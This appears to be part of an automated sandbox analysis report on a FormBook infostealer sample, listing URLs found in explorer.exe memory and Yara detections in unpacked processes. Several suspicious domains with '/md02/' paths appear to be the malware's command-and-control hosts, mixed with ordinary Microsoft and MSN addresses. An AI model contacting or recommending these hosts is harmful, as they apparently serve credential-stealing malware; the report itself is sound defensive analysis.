Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rakring.com
Source: explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rakring.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rakring.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rslotrank.win
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rslotrank.win/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rslotrank.win/md02/www.partymaxclubmen36.click
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.rslotrank.winReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tdshomesolution.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tdshomesolution.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tdshomesolution.com/md02/www.onsen1508.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.tdshomesolution.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teplo-invest.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teplo-invest.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teplo-invest.com/md02/www.zbbnp.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.teplo-invest.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.upcyclecharms.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.upcyclecharms.com/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.upcyclecharms.com/md02/www.hecxion.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.upcyclecharms.comReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbbnp.xyz
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbbnp.xyz/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbbnp.xyz/md02/www.33mgbet.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zbbnp.xyzReferer:
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zruypj169g.top
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zruypj169g.top/md02/
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zruypj169g.top/md02/www.teplo-invest.com
Source: explorer.exe, 00000006.00000003.2980572584.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980877710.000000000C3C7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2980754264.000000000C3AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4577533045.000000000C3C8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979640982.000000000C39F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.zruypj169g.topReferer:
Source: explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000006.00000002.4575208679.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000000.2137414570.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000002.4566997976.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137414570.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000006.00000002.4575208679.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2140399407.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: Iifpj4i2kC.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000002.4566997976.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075903559.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2137896788.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979328846.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000006.00000000.2140399407.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4575546415.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2981043334.000000000C086000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564447597.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000006.00000000.2134991048.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4564940025.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3076250525.0000000007414000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de9b1ad88.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Iifpj4i2kC.exe.28de998d6f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4561305483.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2191414219.0000000004BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4561401625.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
